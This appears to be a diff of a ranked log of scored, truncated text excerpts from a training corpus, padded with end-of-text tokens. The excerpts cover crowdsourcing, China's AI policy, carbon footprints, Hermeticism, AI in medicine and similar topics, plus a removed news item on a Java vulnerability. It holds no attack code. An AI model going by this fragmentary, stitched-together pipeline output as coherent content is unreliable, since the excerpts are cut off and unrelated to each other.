we will describe the work of Breiman and his colleagues as set out in their seminal book "Classification and Regression Trees." Theirs is a very rich story, and we will concentrate on only the essential ideas... @@ -224,7 +274,22 @@ Before we start developing a general theory, let's consider an example using a m Sepal Length Sepal Width Petal Length Petal Width Species ================================================================================ -Rank = 11; Score = 6193152.0 +Rank = 13; Score = 3653632.0 +<|begin_of_text|>Crowdsourcing is a sourcing model in which individuals or organizations obtain goods and services. These services include ideas and finances, from a large, relatively open and often rapidly-evolving group of internet users; it divides work between participants to achieve a cumulative result. The word crowdsourcing itself is a portmanteau of crowd and outsourcing, and was coined in 2005.[1][2][3][4] As a mode of sourcing, crowdsourcing existed prior to the digital age (i.e. "offline").[5] + +There are major differences between crowdsourcing and outsourcing. Crowdsourcing comes from a less-specific, more public group, whereas outsourcing is commissioned from a specific, named group, and includes a mix of bottom-up and top-down processes.[6][7][8] Advantages of using crowdsourcing may include improved costs, speed, quality, flexibility, scalability, or diversity.[9][10] + +Some forms of crowdsourcing, such as in "idea competitions" or "innovation contests" provide ways for organizations to learn beyond the "base of minds" provided by their employees (e.g. LEGO Ideas).[11] Tedious "microtasks" performed in parallel by large, paid crowds (e.g. Amazon Mechanical Turk) are another form of crowdsourcing. It has also been used by not-for-profit organizations and to create common goods (e.g. Wikipedia).[12] The effect of user communication and the platform presentation should be taken into account when evaluating the performance of ideas in crowdsourcing contexts.[13] + +Definitions [ edit ] + +The term "crowdsourcing" was coined in 2005 by Jeff Howe and Mark Robinson, editors at Wired, to describe how businesses were using the Internet to "outsource work to the crowd",[1] which quickly led to the portmanteau "crowdsourcing." Howe, first published a definition for the term crowdsourcing in a companion blog post to his June 2006 Wired article, "The Rise of Crowdsourcing", which came out in print just days later:[14] + +"Simply defined, crowdsourcing represents the act of a company or institution taking a function once performed by employees and outsourcing it to an undefined (and generally large) network of people in the form of an open call. This can take the form of peer-production (when the job is performed collaboratively), but is also often undertaken by sole individuals. The crucial prerequisite is the use of the open call format and the large network of potential laborers." + +In a February 1, 200 +================================================================================ +Rank = 14; Score = 3522560.0 <|begin_of_text|>In the report, titled "China's Rise in Artificial Intelligence," the investment bank said the world's second-largest economy has emerged as a major global contender in using AI to drive economic progress. Goldman said the government and companies have identified AI and machine learning as the next big areas of innovation. @@ -241,42 +306,47 @@ In July, China's State Council issued guidelines on developing AI inside the cou The Council encouraged the creation of open-source computing platforms and training more AI professionals and scientists. The guidelines said the government will invest in qualified AI projects and encourage private capital investment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 12; Score = 6029312.0 -<|begin_of_text|>We CAN predict the future (a bit): Why the brain knows what's going to happen before it does +Rank = 15; Score = 3489792.0 +<|begin_of_text|>Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). -People subconsciously make thousands of tiny predictions each day, whether it's contemplating when a bus will arrive, who is knocking on the door or if a dropped glass will break. +Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). -Now scientists are beginning to unravel how the brain is such a surprisingly accurate fortune-teller - but only when it comes to mundane events. +Figure 1. National carbon dioxide (CO2) emissions per capita. (2005). (Source: UNEP/GRID-Arendal Maps and Graphics Library) -Researchers at Washington University in St Louis focused on the mid-brain dopamine system (MDS), which provides signals to the rest of the brain when unexpected events occur. +An individual’s or organization’s carbon footprint can be broken down into the primary and secondary footprints. The primary footprint is the sum of direct emissions of greenhouse gases from the burning of fossil fuels for energy consumption and transportation. More fuel-efficient cars have a smaller primary footprint, as do energy-efficient light bulbs in your home or office. Worldwide, 82% of anthropogenic greenhouse gas emissions are in the form of CO 2 from fossil fuel combustion (Figure 2). -Each of us makes thousands of tiny predictions, such as contemplating when a bus will arrive, every day. Scientists are now beginning to unravel how the brain is such a surprisingly accurate fortune-teller +The secondary footprint is the sum of indirect emissions of greenhouse gases during the lifecycle of products used by an individual or organization. For example, the greenhouse gases emitted during the production of plastic for water bottles, as well as the energy used to transport the water, contributes to the secondary carbon footprint. Products with more packaging will generally have a larger secondary footprint than products with a minimal amount of packaging. -Using functional MRI (fMRI), they found that this system encodes prediction error when viewers are forced to choose what will happen next in a video of an everyday event. +Greenhouse gases and the greenhouse effect -They found that between 80 and 90 per cent of viewer predictions were correct, depending on when the footage was stopped. +Figure 2. Anthropogenic greenhouse gas emissions. (Source: Energy Information Administration) -Lead researcher Jeffrey Zacks said predicting the near future is vital in guiding behaviour and is a key component of theories of perception, language processing and learning. +Although carbon footprints are reported in annual tons of CO 2 emissions, they actually are a measure of total greenhouse gas emissions. A greenhouse gas is any gas that traps heat in the atmosphere through the greenhouse effect. Because of the presence of greenhouse gases in our atmosphere the average temperature of the Earth +================================================================================ +Rank = 16; Score = 3457024.0 +<|begin_of_text|>Hermeticism is based on the teachings of a mysterious man named Hermes Trismegistus. He is portrayed as a wise teacher, a powerful magician, and a skilled mystic. He has been seen as a teacher of Moses, the inventor of alchemy, and the founder of occult schools throughout history. -He said: 'It's valuable to be able to run away when the lion lunges at you, but it's super-valuable to be able to hop out of the way before the lion jumps. +Alexandrian Origins -'It's a big adaptive advantage to look just a little bit over the horizon.' +Hermes Trismegistus is a composite of several mythological figures. He arose in Ptolemaic Alexandria, where the mishmash of Hellenistic and Egyptian culture bred dozens of interesting cults, religions, and deities. Early on, the Hellenistic deity Hermes became associated with the Egyptian deity Thoth.1 Both were inventors of writing and gods of magic. Both were also psychopomps, responsible for guiding souls in the afterlife. As a result, over the centuries they became identified with each other and were even worshiped together in certain Egyptian temples. In fact, Khmun, the Egyptian center for the cult of Thoth, became known as Hermopolis under the Ptolemies. -The research will also help those in the early stages of neurological diseases such as schizophrenia, Alzheimer's and Parkinson's, Professor Zacks said. +Because of this, Hermes Trismegistus, as a legendary teacher of magic and mysticism, was probably a humanized syncretization of Hermes and Thoth. His legacy has been immense. -The scientists tested healthy young volunteers who were shown films of everyday events such as washing a car, building a Lego model or washing clothes. The film would be watched for a while, and then it was stopped. +Multiple Hermes? -Participants were then asked to predict what would happen five seconds later when the film was re-started by selecting a picture that showed what would happen. +Even though Hermes Trismegistus was a mythical figure, many ancient writers wrote about him as if he was a real person. This produced disagreements and confusion. At some point, it began to be assumed that there were two Hermes. In Asclepius, Hermes Trismegistus talks about his grandfather: -Half of the time, the movie was stopped just before an event boundary, when a new event was just about to start. The other half of the time, the film was stopped in the middle of an event. +Is it not true that my grandfather Hermes, after whom I am named, resides in his eponymous town whence he aids and cures all those who come to him from every land? -The researchers found that participants were more than 90 per cent correct in predicting activity within the event, but less than 80 per cent correct in predicting across the event boundary. They were also less confident in their predictions. +Asclepius 372 -'Successful predictions are associated with the subjective experience of a smooth stream of consciousness' +This passage indicates that the Grandfather Hermes is in fact identical with the deity Hermes, residing at Hermopolis.3 Ancient writers invented additional Hermes to fill in the gaps. In fact, it could be that the title “Trismegistus” refers to many great Hermes characters, a line of sages and mystics bringing the Hermetic teachings to humanity over many generations.4 -Professor Zacks said: +Astrologer, Magus, Alchemist + +The Hermetica that we read and write about most often are not the only ancient books ascribed to Hermes Trismegistus. Multiple important early works on astrology were also attributed to the legendary sage. The link between Hermes and ================================================================================ -Rank = 13; Score = 5865472.0 +Rank = 17; Score = 3424256.0 <|begin_of_text|>A year ago, we shared with you our belief that Algorithm Development is Broken, where we laid out the problems in the world of algorithm development, and our vision of how to make things better. Since then, we’ve been working hard to create our vision of the world’s first open marketplace for algorithms – and you, the developers of the world, have enthusiastically joined us to help active the algorithm economy. @@ -321,34 +391,7 @@ Dozens of microservice building blocks Thanks to the thousands of developers who joined our cause, contributed algorithms, and gave us countless hours of feedback so far. We are very excited to be opening our doors, and ================================================================================ -Rank = 14; Score = 5767168.0 -<|begin_of_text|>Feb 6, 2017 - -This blog post will demonstrate how deep reinforcement learning (deep Q-learning) can be implemented and applied to play a CartPole game using Keras and Gym, in less than 100 lines of code! - -I’ll explain everything without requiring any prerequisite knowledge about reinforcement learning. - -The code used for this article is on GitHub. - -Reinforcement Learning - -Reinforcement Learning is a type of machine learning that allows you to create AI agents that learn from the environment by interacting with it. Just like how we learn to ride a bicycle, this kind of AI learns by trial and error. As seen in the picture, the brain represents the AI agent, which acts on the environment. After each action, the agent receives the feedback. The feedback consists of the reward and next state of the environment. The reward is usually defined by a human. If we use the analogy of the bicycle, we can define reward as the distance from the original starting point. - -Deep Reinforcement Learning - -Google’s DeepMind published its famous paper Playing Atari with Deep Reinforcement Learning, in which they introduced a new algorithm called Deep Q Network (DQN for short) in 2013. It demonstrated how an AI agent can learn to play games by just observing the screen without any prior information about those games. The result turned out to be pretty impressive. This paper opened the era of what is called ‘deep reinforcement learning’, a mix of deep learning and reinforcement learning. - -Click to Watch: DeepMind’s Atari Player - -In Q-Learning Algorithm, there is a function called Q Function, which is used to approximate the reward based on a state. We call it Q(s,a), where Q is a function which calculates the expected future value from state s and action a. Similarly in Deep Q Network algorithm, we use a neural network to approximate the reward based on the state. We will discuss how this works in detail. - -Cartpole Game - -Usually, training an agent to play an Atari game takes a while (from few hours to a day). So we will make an agent to play a simpler game called CartPole, but using the same idea used in the paper. - -CartPole is one of the simplest environments in OpenAI gym (a game simulator). As you can see in the animation from the top, the goal of CartPole is to balance a pole connected with one joint on top of a moving cart. Instead of pixel information, there are 4 kinds of information given by the state, such as angle of the -================================================================================ -Rank = 15; Score = 5734400.0 +Rank = 18; Score = 3358720.0 <|begin_of_text|>In the world of elearning, microlearning has become a buzzword. It’s considered a powerful new approach to training the workforce. With the average attention span in North America dropping from 12 seconds in 2000 to 8 seconds in 2015, the demand for shorter, more engaging training is higher than ever! In this post, our goal is to cover the basics and leave you with an understanding of: What Microlearning is and the benefits it can provide. Throughout this post, we’ll try to give you examples of how to use microlearning in your own training programs. @@ -391,120 +434,135 @@ Different ways to use Microlearning: Microlearning yields many benefits for organizations looking ================================================================================ -Rank = 16; Score = 5734400.0 -<|begin_of_text|>Just a few years ago the common perception was that we were in an AI winter. +Rank = 19; Score = 3260416.0 +<|begin_of_text|>Computer Vision for Music Identification -Although there were lots of narrow AI applications running in the background of our daily lives, there wasn’t much enthusiasm. +by Yan Ke, Derek Hoiem, and Rahul Sukthankar -But quietly in the background, a revolution was building thanks to progress across a few key areas. These areas would soon converge to produce breakthrough after breakthrough and put us on the verge of what many believe to be the most important event in human history. +Abstract: -Key Advance 1) More Data +We describe how certain tasks in the audio domain can be effectively addressed using computer vision approaches. This paper focuses on the problem of music identification, where the goal is to reliably identify a song given a few seconds of noisy audio. Our approach treats the spectrogram of each music clip as a 2-D image and transforms music identification into a corrupted sub-image retrieval problem. By employing pairwise boosting on a large set of Viola-Jones features, our system learns compact, discriminative, local descriptors that are amenable to efficient indexing. During the query phase, we retrieve the set of song snippets that locally match the noisy sample and employ geometric verification in conjunction with an EM-based "occlusion" model to identify the song that is most consistent with the observed signal. We have implemented our algorithm in a practical system that can quickly and accurately recognize music from short audio samples in the presence of distortions such as poor recording quality and significant ambient noise. Our experiments demonstrate that this approach significantly outperforms the current state-of-the-art in content-based music identification. -Andrew Ng of Baidu explains that a massive amount of data is needed. If you put 10x the data in many of these algorithms they work, put 1/10th in and they don’t. +Y. Ke, D. Hoiem, and R. Sukthankar. In Proceedings of Computer Vision and Pattern Recognition, 2005. [PDF 240KB] -Previously it was very difficult to get hold of the massive amounts of data required to feed the AI systems, but thanks to the internet researchers have tonnes of data to train their neural nets. +Demo and Code available here: -Key Advance 2) More Computing Power +Demonstration video: [CVPR05Video.avi 16MB]. Encoded with Indeo 5.10 and IMA ADPCM. There are both Windows and Linux codecs. -If you only have the computational power to build a small neural network it doesn’t work. But computer power has continued to increase and prices have dropped. +Windows/Cygwin and Linux binary demo code and sample music: [mrdemo.tgz 15.7MB] -Moore’s Law may be stalling, but the Law of Accelerating Returns is not. +C++ server code: [musicretr-1.0.tar.gz 87KB] -The Law of Accelerating Returns. What Steve Jurvetson calls “the most important graph ever”. +Java graphical user interface: [mrgui.tgz 21KB]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 3244032.0 +<|begin_of_text|>Three Challenges for Artificial Intelligence in Medicine -GPUs are much better for training neural networks than CPUs and have provided the computer power needed for these algorithms to function. +Brandon Ballinger Blocked Unblock Follow Following Sep 19, 2016 -Infrastructure has also improved. Today it’s possible for anyone to rent a massive amount of GPU power on cloud computing platforms (AWS, Microsoft Azure, Google Cloud, IBM Cloud). +Why is the world’s most advanced AI used for cat videos, but not to help us live longer and healthier lives? A brief history of AI in Medicine, and the factors that may help it succeed where it has failed before. -Key Advance 3) Better Algorithms +Imagine yourself as a young graduate student in Stanford’s Artificial Intelligence lab, building a system to diagnose a common infectious disease. After years of sweat and toil, the day comes for the test: a head-to-head comparison with five of the top human experts in infectious disease. Over the first expert, your system squeezes a narrow victory, winning by just 4%. It beats the second, third, and fourth doctors handily. Against the fifth, it wins by an astounding 52%. -Neural networks have been known about for decades, but most researchers had given up on them +Would you believe such a system exists already? Would you believe it existed in 1979? This was the MYCIN project, and in spite of the excellent research results, it never made its way into clinical practice. [1] -Geoffrey Hinton of Google is one of the few who stuck with it. Despite his peers calling it a dead end, he believed that it was the right approach. It turned out he was right. +In fact, although we’re surrounded by fantastic applications of modern AI, particularly deep learning — self-driving cars, Siri, AlphaGo, Google Translate, computer vision — the effect on medicine has been nearly nonexistent. In the top cardiology journal, Circulation, the term “deep learning” appears only twice [2]. Deep learning has never been mentioned in the New England Journal of Medicine, The Lancet, BMJ, or even JAMA, where the work on MYCIN was published 37 years ago. What happened? -Hinton learned how to stack neural networks dozens of layers deep (deep learning) which enabled vastly more calculations and now he is considered “the godfather of neural networks”. +There are three central challenges that have plagued past efforts to use artificial intelligence in medicine: the label problem, the deployment problem, and fear around regulation. Before we get in to those, let’s take a quick look at the state of medicine today. -With these 3 breakthroughs in place neural networks finally began to work. And they worked better than almost anyone expected. +The Moral Case for AI in Healthcare -The Tipping Point: ImageNet 2012 +Medicine is life and death. With such high stakes, one could ask: should we really be rocking the boat here? Why not just stick with existing, proven, clinical-grade algorithms? -The ImageNet project was created in 2009 to judge how well computers can see. +Well, consider a few examples of the status quo: -In 2011 computers had a 26% error rate when trying to label images. Humans only had a 5% error rate. +The most common prediction model for stroke risk was based on only 25 strokes. Source: Lip 2010 -But in 2012, Hinton’s team made a breakthrough +To be clear, none of this means medical researchers are doing a bad job. Modern medicine is a miracle; it’s just unevenly-distributed. Computer scientists can bring much to the table here. With tools like Apple’s ResearchKit and Google Fit, we can collect health data at scale ================================================================================ -Rank = 17; Score = 5537792.0 -<|begin_of_text|>* Dept of Homeland Security: Java vulnerable to hackers +Rank = 21; Score = 3112960.0 +<|begin_of_text|>Researchers at the University of Liverpool have developed a set of algorithms that will help teach computers to process and understand human languages. -* Could be used to steal identity, form malicious networks +Whilst mastering natural language is easy for humans, it is something that computers have not yet been able to achieve. Humans understand language through a variety of ways for example this might be through looking up it in a dictionary, or by associating it with words in the same sentence in a meaningful way. -* Applies to browsers on all major operating systems +The algorithms will enable a computer to act in much the same way as a human would when encountered with an unknown word. When the computer encounters a word it doesn’t recognise or understand, the algorithms mean it will look up the word in a dictionary (such as the WordNet), and tries to guess what other words should appear with this unknown word in the text. -By Jim Finkle +Semantic representation -Jan 11 (Reuters) - The U.S. Department of Homeland Security urged computer users to disable Oracle Corp’s Java software, amplifying security experts’ prior warnings to the hundreds of millions of consumers and businesses that use it to surf the Web. +It gives the computer a semantic representation for a word that is both consistent with the dictionary as well as with the context in which it appears in the text. In order to know whether the algorithm has provided the computer with an accurate representation of a word it compares similarity scores produced using the word representations learnt by the computer algorithm against human rated similarities. -Hackers have figured out a way to exploit Java to install malicious software enabling them to commit crimes ranging from identity theft to making an infected computer part of an ad-hoc network of computers that can be used to attack websites. +Liverpool computer scientist, Dr Danushka Bollegala, said: “Learning accurate word representations is the first step towards teaching languages to computers.” -“We are currently unaware of a practical solution to this problem,” the Department of Homeland Security’s Computer Emergency Readiness Team said in a posting on its website late on Thursday. +“If we can represent the meaning for a word in a way a computer could understand, then the computer will be able to read texts on behalf of humans and perform potentially useful tasks such as translating a text written in a foreign language, summarising a lengthy article, or find similar other documents from the Internet. -“This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered,” the agency said. “To defend against this and future Java vulnerabilities, disable Java in Web browsers.” +“We are excitingly waiting to see the immense possibilities that will be brought about when such accurate semantic representations are used in various language processing tasks by the computers.” -Java is a computer language that enables programmers to write software utilizing just one set of code that will run on virtually any type of computer, including ones that use Microsoft Corp’s Windows, Apple Inc’s OS X and Linux, an operating system widely employed by corporations. +The research was presented at the Association for Advancement of Artificial Intelligence Conference (AAAI-2016) held in Arizona, USA.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 3112960.0 +<|begin_of_text|>In the age of ‘Big Data,’ with datasets rapidly growing in size and complexity and cloud computing becoming more pervasive, data science techniques are fast becoming core components of large-scale data processing pipelines. -Computer users access Java programs through modules, or plug-ins, that run Java software on top of browsers such as Internet Explorer and Firefox. +Apache Spark offers analysts and engineers a powerful tool for building these pipelines, and learning to build such pipelines will soon be a lot easier. Databricks is excited to be working with professors from University of California Berkeley and University of California Los Angeles to produce two new upcoming Massive Open Online Courses (MOOCs). Both courses will be freely available on the edX MOOC platform in spring summer 2015. edX Verified Certificates are also available for a fee. -The U.S. government’s warning on Java came after security experts earlier on Thursday warned of the newly discovered flaw. +The first course, called Introduction to Big Data with Apache Spark, will teach students about Apache Spark and performing data analysis. Students will learn how to apply data science techniques using parallel programming in Spark to explore big (and small) data. The course will include hands-on programming exercises including Log Mining, Textual Entity Recognition, Collaborative Filtering that teach students how to manipulate data sets using parallel processing with PySpark (part of Apache Spark). The course is also designed to help prepare students for taking the Spark Certified Developer exam. The course is being taught by Anthony Joseph, a professor at UC Berkeley and technical advisor at Databricks, and will start on February 23rd June 1st, 2015. -It is relatively rare for government agencies to advise computer users to completely disable software due to a security bug, particularly in the case of widely used programs such as Java. They typically recommend taking steps to mitigate the risk of attack while manufacturers prepare an update, or hold off on publicizing the problem until an update is prepared. +The second course, called Scalable Machine Learning, introduces the underlying statistical and algorithmic principles required to develop scalable machine learning pipelines, and provides hands-on experience using PySpark. It presents an integrated view of data processing by highlighting the various components of these pipelines, including exploratory data analysis, feature extraction, supervised learning, and model evaluation. Students will use Spark to implement scalable algorithms for fundamental statistical models while tackling real-world problems from various domains. The course is being taught by Ameet Talwalkar, an assistant professor at UCLA and technical advisor at Databricks, and will start on April 14th June 29th, 2015. -In September, the German government advised the public to temporarily stop using Microsoft’s Internet Explorer browser to give it time to patch a security vulnerability that opened it to attacks. +Both courses are available for free on the edX website. You can sign up for them today:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 23; Score = 3096576.0 +<|begin_of_text|>How to use your Emotional Intelligence to Better PM -The Department of Homeland Security said that attackers could trick targets into visiting malicious websites that would infect their PCs with software capable of exploiting the bug in Java. +Veamly Blocked Unblock Follow Following Jun 26, 2017 -It said that an attacker could also infect a legitimate website by uploading malicious software that would infect machines of computer users who trust that site because they have previously visited it without experiencing any problems. +(Originally posted on Veamly) -They said developers of several popular tools known as exploit kits, which criminal hackers use to attack PCs, have added software that allows hackers to exploit the newly discovered bug in Java to attack -================================================================================ -Rank = 18; Score = 5505024.0 -<|begin_of_text|>ARMONK, NY - 28 Aug 2012: IBM (NYSE: IBM) today announced the zEnterprise® EC12 mainframe server, the most powerful and technologically advanced version of an IBM system that has been the linchpin of enterprise computing for 48 years. The new enterprise system features technologies that demonstrate IBM’s ongoing commitment to meet the growing need to secure and manage critical information with the System z mainframe. +Note : This blog is based on Vivek Bedi’s talk, The VP of Product at LearnVest on Product School -Mainframes support significant portions of the data environment at most large enterprises. As these enterprises grapple with the well-documented growth of data, they are looking for new ways to secure and gain insights from such critical information as financial, customer and enterprise resource data that will enable them to provide their clients with new services. The new zEC12 offers industry-leading security and robust support for operational analytics that can help clients efficiently sift through large volumes of raw data and transform it to gain knowledge that can be used for competitive advantage. For example, a retailer managing online transactions on zEC12 can gain insights from client information that will enable it to provide clients with a more customized shopping experience. +As a Product Manager, you don’t only need to oversee the production process, but you also have to lead and motivate your team. After all, they are the people behind the success or the failure of the product. But the thing is that, they all have different personalities and come from very different backgrounds. -The IBM zEC12 enterprise system is the result of an investment by IBM Systems and Technology Group of more than $1 billion in 